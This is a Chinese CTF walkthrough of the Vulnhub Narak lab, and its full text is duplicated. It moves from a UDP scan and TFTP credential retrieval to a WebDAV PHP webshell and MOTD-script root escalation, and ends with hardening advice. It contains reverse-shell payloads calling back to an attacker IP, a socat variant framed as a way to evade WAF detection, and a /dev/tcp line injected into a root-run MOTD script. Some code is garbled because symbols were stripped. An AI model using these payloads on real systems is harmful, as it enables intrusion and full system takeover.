)
Vulnhub靶机Narak渗透实战非常规攻击链的思维突破当所有常规扫描工具都告诉你此路不通时真正的渗透测试才刚刚开始。Narak靶机就像它的名字印度神话中的地狱一样用看似封闭的环境考验着攻击者的思维灵活性。本文将带你体验一次完整的地狱逃生从被忽视的UDP服务到冷门的motd提权每个环节都颠覆着传统渗透测试的认知框架。1. 思维破局当TCP扫描一无所获时大多数渗透测试教程都会教你从nmap的TCP扫描开始。但在真实环境中过于依赖单一协议往往是致命的思维盲区。让我们看看Narak如何用实际案例教育我们# 标准TCP全端口扫描结果仅显示22/80开放 nmap -p- 10.10.10.144 --min-rate 10000当TCP扫描只发现SSH和HTTP服务时菜鸟可能会立即转向web渗透而老手则会思考三个关键问题服务伪装是否可能存在端口 knocking等隐藏机制协议扩展UDP、SCTP等其他传输层协议是否被忽略数据干扰防火墙是否对扫描流量进行了干扰此时针对UDP服务的扫描给出了突破口# 重点扫描常见UDP服务端口 nmap -sU -p69,161,123,53 10.10.10.144关键发现TFTP69/UDP服务的开放成为了整个渗透链条的起点。这个设计精巧的陷阱完美诠释了靶机描述中的警告你最信任的工具也会背叛你。2. TFTP协议被遗忘的入口简单文件传输协议TFTP在现代网络中就像个透明人但正是这种存在感薄弱的特点使它成为敏感信息泄露的理想通道。与常规FTP不同TFTP具有以下特征特性TFTPFTP认证机制无用户名/密码数据传输UDP 69端口TCP 20/21端口命令集仅get/put完整文件操作命令目录浏览不支持支持实战中获取creds.txt的操作看似简单却暗藏玄机tftp 10.10.10.144 get creds.txt quit # 解码获取的凭证 cat creds.txt | base64 -d注意TFTP默认传输文件大小限制为32MB且不支持加密。在企业内网渗透中常被用于下载网络设备配置文件。3. WebDAV的非常规利用通过TFTP获取的凭证打开了WebDAV的大门但常规的目录浏览却显示空文件夹。这里需要理解WebDAV的以下特性HTTP扩展协议允许客户端进行文件管理操作权限模型继承Web服务器权限设置危险方法PUT/DELETE等方法的开启可能导致安全问题使用davtest进行自动化测试davtest -url http://10.10.10.144/webdav -auth yamdoot:Swarg测试结果中PHP文件的执行权限成为了突破口。上传的webshell需要注意几个细节?php // 避免使用system()等容易被禁用的函数 $sockfsockopen(10.10.10.128,1234); exec(/bin/bash -i 3 3 23); ?技术演进现代WAF通常会检测常规反弹shell代码可以尝试以下变体?php $cmd socat TCP:10.10.10.128:1234 EXEC:/bin/bash; shell_exec($cmd); ?4. Brainfuck编码隐藏的SSH凭证在获取www-data权限后系统内发现的hell.sh脚本包含了一段看似乱码的字符--[-----]---....--.[-]..--[---]--.-----..这是Brainfuck语言的典型特征这种极简主义编程语言由8个命令组成字符含义ASCII操作指针右移内存指针1指针左移内存指针-1当前字节加1*ptr 1-当前字节减1*ptr - 1.输出当前字节putchar(*ptr),输入当前字节*ptr getchar()[循环开始while(*ptr) {]循环结束}使用beef解码器处理beef hell.bf # 输出chitragupt这个发现引出了渗透测试中的一个重要原则任何非常规文件格式都可能是突破口。类似的编码还包括凯撒密码Base家族编码16/32/58/64等零宽字符隐写二进制像素编码5. MOTD提权被忽视的黄金通道Message of the DayMOTD是Linux登录时显示的系统信息其脚本位于/etc/update-motd.d/目录。Narak靶机中00-header文件的错误权限配置造就了完美的提权机会# 检查文件权限 ls -l /etc/update-motd.d/00-header -rwxrwxrwx 1 root root 853 May 15 2020 /etc/update-motd.d/00-header # 注入反弹shell echo bash -i /dev/tcp/10.10.10.128/4444 01 /etc/update-motd.d/00-header权限提升原理MOTD脚本由sshd服务在用户登录时触发SSH服务通常以root权限运行脚本执行继承父进程权限上下文因此注入的代码会以root权限执行这种提权方式在现实环境中同样有效特别是在以下场景云服务器默认配置运维人员疏忽的权限设置自动化部署工具的错误配置6. 防御视角如何加固你的系统从防守方角度看Narak靶机暴露的安全问题我们可以总结出以下加固措施服务层面禁用非必要UDP服务TFTP/DNS等对WebDAV实施严格的ACL控制定期审计/etc/update-motd.d/目录权限# 示例加固命令 chmod 750 /etc/update-motd.d/ chown root:root /etc/update-motd.d/*监控层面建立TFTP异常下载告警监控WebDAV目录的文件上传行为跟踪MOTD脚本的修改记录架构层面对管理接口实施网络隔离遵循最小权限原则配置服务账户定期进行红蓝对抗演练渗透测试的艺术在于不断突破思维定式。Narak靶机通过精心设计的攻击链告诉我们最危险的安全漏洞往往存在于那些被所有人忽视的角落。当你的扫描器显示没有发现漏洞时或许真正的挑战才刚刚开始。
Vulnhub靶机Narak实战:从tftp到motd提权的完整渗透记录(附brainfuck解码技巧)
发布时间:2026/5/19 1:57:00
Vulnhub靶机Narak渗透实战非常规攻击链的思维突破当所有常规扫描工具都告诉你此路不通时真正的渗透测试才刚刚开始。Narak靶机就像它的名字印度神话中的地狱一样用看似封闭的环境考验着攻击者的思维灵活性。本文将带你体验一次完整的地狱逃生从被忽视的UDP服务到冷门的motd提权每个环节都颠覆着传统渗透测试的认知框架。1. 思维破局当TCP扫描一无所获时大多数渗透测试教程都会教你从nmap的TCP扫描开始。但在真实环境中过于依赖单一协议往往是致命的思维盲区。让我们看看Narak如何用实际案例教育我们# 标准TCP全端口扫描结果仅显示22/80开放 nmap -p- 10.10.10.144 --min-rate 10000当TCP扫描只发现SSH和HTTP服务时菜鸟可能会立即转向web渗透而老手则会思考三个关键问题服务伪装是否可能存在端口 knocking等隐藏机制协议扩展UDP、SCTP等其他传输层协议是否被忽略数据干扰防火墙是否对扫描流量进行了干扰此时针对UDP服务的扫描给出了突破口# 重点扫描常见UDP服务端口 nmap -sU -p69,161,123,53 10.10.10.144关键发现TFTP69/UDP服务的开放成为了整个渗透链条的起点。这个设计精巧的陷阱完美诠释了靶机描述中的警告你最信任的工具也会背叛你。2. TFTP协议被遗忘的入口简单文件传输协议TFTP在现代网络中就像个透明人但正是这种存在感薄弱的特点使它成为敏感信息泄露的理想通道。与常规FTP不同TFTP具有以下特征特性TFTPFTP认证机制无用户名/密码数据传输UDP 69端口TCP 20/21端口命令集仅get/put完整文件操作命令目录浏览不支持支持实战中获取creds.txt的操作看似简单却暗藏玄机tftp 10.10.10.144 get creds.txt quit # 解码获取的凭证 cat creds.txt | base64 -d注意TFTP默认传输文件大小限制为32MB且不支持加密。在企业内网渗透中常被用于下载网络设备配置文件。3. WebDAV的非常规利用通过TFTP获取的凭证打开了WebDAV的大门但常规的目录浏览却显示空文件夹。这里需要理解WebDAV的以下特性HTTP扩展协议允许客户端进行文件管理操作权限模型继承Web服务器权限设置危险方法PUT/DELETE等方法的开启可能导致安全问题使用davtest进行自动化测试davtest -url http://10.10.10.144/webdav -auth yamdoot:Swarg测试结果中PHP文件的执行权限成为了突破口。上传的webshell需要注意几个细节?php // 避免使用system()等容易被禁用的函数 $sockfsockopen(10.10.10.128,1234); exec(/bin/bash -i 3 3 23); ?技术演进现代WAF通常会检测常规反弹shell代码可以尝试以下变体?php $cmd socat TCP:10.10.10.128:1234 EXEC:/bin/bash; shell_exec($cmd); ?4. Brainfuck编码隐藏的SSH凭证在获取www-data权限后系统内发现的hell.sh脚本包含了一段看似乱码的字符--[-----]---....--.[-]..--[---]--.-----..这是Brainfuck语言的典型特征这种极简主义编程语言由8个命令组成字符含义ASCII操作指针右移内存指针1指针左移内存指针-1当前字节加1*ptr 1-当前字节减1*ptr - 1.输出当前字节putchar(*ptr),输入当前字节*ptr getchar()[循环开始while(*ptr) {]循环结束}使用beef解码器处理beef hell.bf # 输出chitragupt这个发现引出了渗透测试中的一个重要原则任何非常规文件格式都可能是突破口。类似的编码还包括凯撒密码Base家族编码16/32/58/64等零宽字符隐写二进制像素编码5. MOTD提权被忽视的黄金通道Message of the DayMOTD是Linux登录时显示的系统信息其脚本位于/etc/update-motd.d/目录。Narak靶机中00-header文件的错误权限配置造就了完美的提权机会# 检查文件权限 ls -l /etc/update-motd.d/00-header -rwxrwxrwx 1 root root 853 May 15 2020 /etc/update-motd.d/00-header # 注入反弹shell echo bash -i /dev/tcp/10.10.10.128/4444 01 /etc/update-motd.d/00-header权限提升原理MOTD脚本由sshd服务在用户登录时触发SSH服务通常以root权限运行脚本执行继承父进程权限上下文因此注入的代码会以root权限执行这种提权方式在现实环境中同样有效特别是在以下场景云服务器默认配置运维人员疏忽的权限设置自动化部署工具的错误配置6. 防御视角如何加固你的系统从防守方角度看Narak靶机暴露的安全问题我们可以总结出以下加固措施服务层面禁用非必要UDP服务TFTP/DNS等对WebDAV实施严格的ACL控制定期审计/etc/update-motd.d/目录权限# 示例加固命令 chmod 750 /etc/update-motd.d/ chown root:root /etc/update-motd.d/*监控层面建立TFTP异常下载告警监控WebDAV目录的文件上传行为跟踪MOTD脚本的修改记录架构层面对管理接口实施网络隔离遵循最小权限原则配置服务账户定期进行红蓝对抗演练渗透测试的艺术在于不断突破思维定式。Narak靶机通过精心设计的攻击链告诉我们最危险的安全漏洞往往存在于那些被所有人忽视的角落。当你的扫描器显示没有发现漏洞时或许真正的挑战才刚刚开始。
)
